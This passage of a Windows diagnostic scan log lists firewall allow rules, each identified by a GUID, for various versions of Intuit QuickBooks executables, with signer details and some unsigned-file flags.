(Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{8263B699-ABF3-4777-B8C0-9AD64CEA385A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{2236F642-AF1E-43DF-BDC6-F3F62274F5FB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{D2461E8D-4BC1-4D61-A4ED-C52AA63747A3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{61B991DB-702A-44F9-85F0-C36A1D87A994}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{C9A260B0-90F3-42E7-83C3-A6920BE9C6E5}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{9F99AD28-5AA6-460F-BCC1-7E034DD49611}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{7DB7E0F6-7ED5-4F71-A103-95DCEDE77D62}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{9F416B5F-C66A-44EC-877E-00F71FD5D992}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{CCD63AEC-A159-4464-8B80-560BDAB99B55}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{9B7C996C-87B6-4EDE-9CD5-DD939A00E45E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{1DF69C43-3B67-4841-8D6D-FDCB4747896B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{323A3872-8526-4409-95C1-739915C2980B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{DDC83EF6-5D0E-4703-94F5-C859D3461B9A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{A81C1F60-5B5E-4B4C-A452-4D857AA32C55}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{B919335C-9B0E-416B-BA23-390FC6AE0D6B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{2589B99B-6007-4195-81F2-BF1399B9ED61}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{B9FE58DC-64DF-4827-A66D-966DDB89E92D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{E278FC2C-B44B-4583-9079-07B9210A558A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{42BB8426-9605-4335-BB31-624C252DEF57}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{FFC04763-555B-4DB3-B0E8-B06136ACEFFC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{3C830B23-29F8-47B8-94E3-CC9090E7FE38}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{10A7682F-D0CD-4E18-827E-166CF54F14B3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{B6E76ED2-CA84-40FE-B677-9CFBB80957BC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{7B6EF6FE-DC7A-4033-BDF3-4470D2F927BF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{B082BAB4-A519-4351-A0DC-5E818C0869CA}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{E5A7A884-509B-4566-86A6-FB6E3CC30816}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{BBE5F3EB-7D63-47BE-B88A-9463B1374C49}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{E5768596-EB8E-407C-B712-856C46F48FF1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{79CDEE12-E481-4FA4-96AC-22E161572505}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{7D51369C-40DF-4382-8FD4-9C067461F190}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{BF9135CC-DCB8-47CC-ABBF-8FB9E4EC4B17}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{E885502B-08F4-4BCF-99EE-D2B239E3253B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{B7EC8151-FC1C-4A15-B6F1-74BE7F4B36C3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{5FA96485-8311-4CCC-A6F7-443F4892BEA4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{72BD12BE-66F7-4DBB-A494-DEC933457746}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{A66BE486-0C12-49F5-9986-70537C5C307D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{60FF4338-1547-4AFB-A0E7-BD4733EFD017}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{7DD14CC0-A913-42F0-B475-938813A8E514}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{02CD14C8-580A-405C-A469-D79ACD71BDEA}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{81A4118F-3BC3-4794-AED1-D951BA9DF554}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{19CC6C52-04D1-4295-A82E-0E40E73BC29B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{DF67E042-898D-4ED1-8871-787F33EDA58B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{FD6D1F5D-891B-4A25-816F-C3CCD9C14A42}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{22593620-1EF6-4956-B778-D1042C1FB7A3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{A9850483-439B-4FB8-A541-C5AC16C4F086}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{6DD0C8B7-FEE9-48CA-AF93-3377F5186642}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{E0D89A44-DDA5-47E1-8C12-C5991787BF6C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{9CE8C932-75D5-4987-B2EE-7F042AB64883}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{DFF4F06D-5841-4685-B31C-172D6DCF80EE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{8C2E53A7-9554-43CD-8AEC-7226694BC846}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{E1FEBA70-E763-4517-ADBB-38406408A8ED}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{9D7A9C02-2EB9-4B63-9170-4F3480276DDA}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{F2CF4EA0-CDBF-4454-9EDE-1E4CCA3BBDC9}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{3F7607E7-8439-4A43-8C0B-425B44D7C1AB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{716EC28A-B355-4657-B247-A9CFD6FE1614}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{C1454B80-337F-4C2C-8D73-8892E104E573}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{A5E4D61E-BE9A-4F20-A096-F500A2B30BEB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2010\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{CFF92FD2-9B39-4BBA-BC2B-B7C90DAEE771}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2010\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{E7BDA165-4098-4C78-B12B-5CB0AAD5BE3A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{59F0281E-3A9B-4C8D-B92B-9E37A43C2EAE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{3C3BFAC5-CECB-4082-A952-58F61CD5A386}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{FD85B37E-A8A1-4A74-92A2-C49F1502E740}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{023C759E-0EFA-4A5B-9A45-5D98B429F792}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{5B0693A3-4692-4429-966B-216F90273576}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{8DAED373-FC16-4D32-A082-993FF4616279}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\qbdbmgrn.exe (SAP -> Intuit, Inc.) [File not signed] FirewallRules: [{09FDB363-AEE4-4A24-BF3F-9DF4FF3AC60A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\qbdbmgrn.exe (SAP -> Intuit, Inc.) [File not signed] FirewallRules: [{8C957F50-2063-4AD0-8A61-3DC4556BFA79}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (Intuit, Inc. -> SAP AG or an SAP affiliate company) FirewallRules: [{33907125-B765-4780-88D6-8D16F1BD0C74}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (Intuit, Inc. -> SAP AG or an SAP affiliate company) FirewallRules: [{3B63E981-C243-4AE8-81D6-09A364208548}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{4D72CB44-1D07-4E9A-9428-C0985F78F871}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{A2EC76B8-8F7D-4CDC-BEE8-6AFEB355229F}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{A3F7F09D-4B54-4ADA-8DFB-35247DD13055}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{24870936-9A37-4F08-884F-F834D8CD24FC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{5234CA0F-0FC4-43DF-908B-C4095BD671B5}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 18.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{7BB5E244-8498-4949-B7BE-B820EE527510}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{DEBB9DA0-D253-406A-9E15-699C77664C4A}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{5A9C2311-52A1-4418-A1FC-68FF5D45BE5E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{75CAC14F-629A-4416-97B8-C010A9EFF5A6}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 19.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{0D80441C-BC09-49F1-9D9E-221A7DB6F6D0}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{08FD5EB4-E023-4643-B7E5-6BB6776B2CDE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2020\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{3FC649AA-CA42-43A2-9BD6-1AFD2FB9B3C0}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{7A0EABC1-820D-4EEB-AEB0-67A372F23024}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{0E59B25B-8FAF-49AC-8077-45891450A5EC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{01EF6A93-F5F1-4A10-A481-943E2FF64D70}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2021\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{8A6C0011-C425-485D-833A-DD273D39A565}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{2E882A8C-7551-4B0A-B737-5ADD68A80957}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 21.0\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{DEC3B06E-BDCC-4B8D-90DF-3DC3E1202C03}] => (Allow) C:\Program Files\Intuit\QuickBooks Enterprise Solutions 22.0\QBDBMgrN.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{85B4DB04-8779-45A8-880A-D0A0F2937A4A}] => (Allow) C:\Program Files\Intuit\QuickBooks Enterprise Solutions 22.0\QBDBMgrN.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{19C18DCB-FE23-46A0-804B-FE8306D4DEDA}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 20.0\CefSharp.BrowserSubprocess.exe (The CefSharp Authors) [File not signed] FirewallRules: [{DAFAF92E-3A3F-4879-AD65-35AA313DE767}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{3B67D3EF-D6BE-4982-9800-035902C8044D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{CAEFBA03-6249-4933-BDD1-2BB5BFA8F680}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{F2E2794B-E205-4B2D-A7EA-82345B3F2EF5}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{86970E28-A5A7-488E-8290-A4CB46BC5E5D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{A758D7E8-A99D-4D8A-9248-F82256805129}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{684D354E-BC7C-425D-95BE-EDA774B448B1}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{354E07F1-B0F3-4F45-A714-797AD949CB01}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2012\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{74F9714D-12B1-474A-BA31-349110A37ED4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{859253C4-D756-4279-AD73-D5EB58BE8CEF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{703D7C34-C6C8-4C5A-B26B-546AE2426AEB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{AC896071-4839-4876-B80E-92C23755CA17}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{5C469FD5-4859-4B53-9071-44B57EC38BE4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{A985C58D-EF32-4A75-9D1D-E0CE7E8D4033}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{BD3D8E42-2580-4929-8BBC-068714606365}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{FD529F57-FDFD-4F75-9190-545E5532B561}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2013\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{26316743-FC09-4D5D-9109-9DC1789BF309}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{F2B2079A-6D96-4474-B501-296D100A5116}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{4674E736-E4CA-4406-BDF4-B505BE745592}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{E33C50AA-EF08-49A5-8C72-BFD11367779B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{03B3743A-4B6F-453B-9262-9410068FBF5D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{FA70C9B5-2B40-45B2-A40D-4EB9F36261DB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{D68DF211-C4F5-4C69-A0F7-167E7D83AEFE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{00196214-9925-417A-AADB-D61CA01BCD7D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{45065A5B-61FB-4E78-A645-82E4B6D112A6}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\qbdbmgrn.exe (SAP -> Intuit, Inc.) [File not signed] FirewallRules: [{30009D89-472B-408C-A5F2-3B4DA3325681}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\qbdbmgrn.exe (SAP -> Intuit, Inc.) [File not signed] FirewallRules: [{65638746-FF82-4DAE-B474-FCB2A55C00E6}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{37F2F330-75F4-44AE-9397-3C4E976AFB54}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{1A5A4ED9-A34F-4FA2-A825-D67CF8551AE7}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{3B6AEF81-67F7-4285-B9C6-63725FC34967}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{25CEE843-D0F9-4A2E-A87B-CCB969C9789E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{1AC7CA6B-D4D5-4491-9329-889D924F8F16}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2016\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{900A494F-59CA-4732-A8F2-EC96BF65117C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (Intuit, Inc. -> SAP AG or an SAP affiliate company) FirewallRules: [{E57955F2-C2BA-40FB-9652-459C8201A8DD}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbdbmgrn.exe (Intuit, Inc. -> SAP AG or an SAP affiliate company) FirewallRules: [{815EC1F8-75F8-474C-91E1-B851E05D2587}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{00B76FDF-7EDA-41D3-9491-0248692CAD6E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{A6E76912-0A6C-42E1-9EA3-C6A62D93F382}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{EDB6365B-6CE6-4801-8441-76F24FC14901}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{D4B668C7-4D2B-4324-A583-3DB8355FB969}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{7BBF55F9-D3FC-43ED-AA3D-538EA2BFEC70}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2017\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{AD31A9CC-C37B-47E7-91C3-71DC0EF39E5B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{80DA2377-4D0A-4A8D-9658-6C54F2B6676D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbdbmgrn.exe (Intuit, Inc.) [File not signed] FirewallRules: [{32CF29BA-410D-4577-AB27-39F4595AACA4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{C574FD0B-30FB-47C5-ABF4-4878BF9EE923}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{F378B3E5-6E16-418E-B93F-8F9AE47788D3}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{6081AA08-D332-46B4-A7AF-1B32C2D815F7}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{5B267C41-DCA2-4C52-98CA-91EF4A122F37}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{9BBA1B7A-AD84-48B6-AD18-A37E6DF429AE}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks Enterprise Solutions 17.0\filemanagement.exe (Intuit, Inc. -> ) FirewallRules: [{7FE3B23E-C3A6-4E6C-B66D-A1298E3D1BC7}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{8FC63164-A99F-44FE-A95A-CE9E77D7606E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company) FirewallRules: [{656BA272-51B9-47E7-9266-B860A68FE30D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{C2AECAF1-7B0C-4A78-AF50-C907CD3AEA23}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{40BEB16E-972A-406E-8958-5DD29629E667}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{362BFB84-DD8D-41EA-9B0A-A2543D8C113B}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.) FirewallRules: [{C9F7EB02-CABB-4E34-B559-07A68D96C128}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe 